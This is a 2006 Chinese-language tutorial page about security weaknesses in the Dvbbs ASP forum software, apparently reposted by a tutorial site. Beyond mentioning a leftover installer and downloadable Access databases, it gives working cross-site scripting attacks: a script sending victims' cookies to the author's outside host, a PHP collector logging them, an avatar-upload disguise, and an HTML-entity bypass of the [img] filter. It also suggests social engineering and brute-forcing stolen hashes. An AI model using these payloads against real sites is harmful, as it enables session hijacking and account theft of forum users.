动网先锋,对动网先锋asp论坛的安全性分析

对动网先锋asp论坛的安全性分析 - 网络安全 - 电脑教程网

对动网先锋asp论坛的安全性分析

日期:2006-10-13   荐:

对动网先锋ASP论坛的安全性分析

这个问题可以说是老声常谈了,早些时候就有个什么***黑客大联盟的论坛被这么黑掉。动网论坛的安装文件名为install.asp,这个想来凡是用过的人都知道,如果你在安装论坛完成后不删除该文件,那么攻击者就能通过该文件重置你的论坛配置,打倒攻击的目的。这个问题不是动网论坛,是由于用户使用不当所致,再次提出为了引起大家注意。

 

2.数据库问题

 

我们都知道,asp论坛大多数都是使用Access数据库,因为个人用户弄不到sqlserver的服务器,所以只能用access数据库,这就使攻击者在得到数据库路径和文件名的情况下对论坛数据库进行下载,下载后只需要用access打开即可看到论坛的所有信息,包括所有用户密码。由于这个原因,所以建议大家一定要将论坛的access文件改成一个没有规律的名字,如3sdal9eklz9c0ad.mdb.像不像是md5加密过,呵呵,不开玩笑,这样才可以避免被人下载:)


 [1] [2] [3] [4] [5] [6] [7] [8]  

 

3.上传头像功能的安全隐患=版权所有  软件 下载  学院  版权所有=

 

这个问题的原因是由于微软的ie漏洞引起的,详细的原因可以参看crazybird的那篇漏洞说明。对于攻击,当然是跨站脚本攻击,如果你不知道什么是跨站脚本攻击,那么看看跨站脚本攻击详解这篇文章!攻击方法就是像我大哥analysist的那篇一种全新的跨站脚本攻击方法所说的那样,首先新建一个文本文件,如shocker.txt,内容如下:

<script>window.open('http://shocker.soage.com/Css.PHP?'+documents.cookie);</script>


 [1] [2] [3] [4] [5] [6] [7] [8]  

其中你要把shocker.soage.com改成你自己的网址,并且css.php是你收集cookie的程序,我的程序代码如下:

------code begin------

<?

#跨站脚本攻击

#<script>window.open('http://shocker.soage.com/css.php?'+documents.cookie);</script>

$info = getenv("QUERY_STRING");

if ($info) {

$info=urldecode($info); //这里将收集到的cookie进行以下url解码


 [1] [2] [3] [4] [5] [6] [7] [8]  

$fp = fopen("chen.txt","a");  //这里chen.txt你可以随便命名

         fputs($fp,"$info\n");

         fclose($fp);

}

header("Location: http://www.gxboy.com/pt"); //呵呵,转到mkill哪里,许多照片呀

?>

-------code end-------

你也可以用cgi的收集cookie程序,很好写,这里就不多说了。如果你不知道,可以来www.china4lert.org参看superdao以前发表过文章,里面都有提到。然后保存后将文件改名为shocker.gif,通过上传头像的功能传到网站上,给别人一看那个图片,就可以实现跨站脚本攻击。抓取别人的cookie。


 [1] [2] [3] [4] [5] [6] [7] [8]  

 

4.图标签的问题

 

就我测试,除了lb5k和phpbb的贴图标签没有问题以外,其他的论坛贴图标签都有问题,主要是正则表达式写得不好,lb5k的[img]标签转换写得就不错,如下:

$signature =~ s/\[img\]\s*(http|https|FTP):\/\/(\S+?)\s*\[\/img\]/<img src=$1:\/\/$2 border=0>/isg;

这样才能防止攻击者提交诸如javascript:alert(documents.cookie);测试,动网的贴图标签就存在着问题,而且只要贴图标签存在的跨站脚本攻击比上传图片的跨站脚本攻击要容易得多,可以在你的签名或贴子里加入[img]Javascript:window.open('http://shocker.soage.com/css.php?'+documents.cookie);[/img]然后提交,但是提交后,发贴子测试发现,并没能起到跨站脚本攻击的作用,这是问什么呢?由于动网论坛把http://这个地方当成图片地址了,结果刚才提交的代码被分成了两段javascript:window.open('和http://shocker.soage.com/css.php?'+documents.cookie);,以至于我们提交的代码丧失了功能。难道就不能攻击了吗?当然不是,我们可以变换种方式提交,代码如下:


 [1] [2] [3] [4] [5] [6] [7] [8]  

[img]javascript:window.open('&#x68;tt&#x70;://shocker.soage.com/css.php?'+documents.cookie);[/img]

看到区别了吧,这段代码把http中的h和p转换成了ascii码Html格式&#x68;和&#x70;,提交后,轮坛并没有找到http,所以我们提交的代码就不会分家了:)达到了攻击的目的

 

以上就是我的对动网论坛的一点分析,其中前两点问题不大,一般用户都可以修正,第三点只存在于动网4.0及以下版本中,而第4点在最新版5.0中也存在问题,这个我测试过,黑客防线的论坛也存在着这种问题,不过由于密码经过了crypt(我根据抓到的wuwei加密过的密码猜的,wuwei别来砍我),所以还是比较安全的,不过有耐心还是可以对抓到的加密过的密码进行暴力破解的,还有许多论坛存在着这种问题,包括cgi和php论坛,这里就不多说了!


 [1] [2] [3] [4] [5] [6] [7] [8]  

 =版权所有  软件 下载  学院  版权所有=

最后我觉得应用社会工程学和跨站脚本攻击配合,可以很好的达到攻击并不被人怀疑,当然,也看对什么人:)

(出处:http://www.sheup.com)


 [1] [2] [3] [4] [5] [6] [7] [8] 

 

以上就是我的对动网论坛的一点分析,其中前两点问题不大,一般用户都可以修正,第三点只存在于动网4.0及以下版本中,而第4点在最新版5.0中也存在问题,这个我测试过,黑客防线的论坛也存在着这种问题,不过由于密码经过了crypt(我根据抓到的wuwei加密过的密码猜的,wuwei别来砍我),所以还是比较安全的,不过有耐心还是可以对抓到的加密过的密码进行暴力破解的,还有许多论坛存在着这种问题,包括cgi和php论坛,这里就不多说了!


 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  

标签: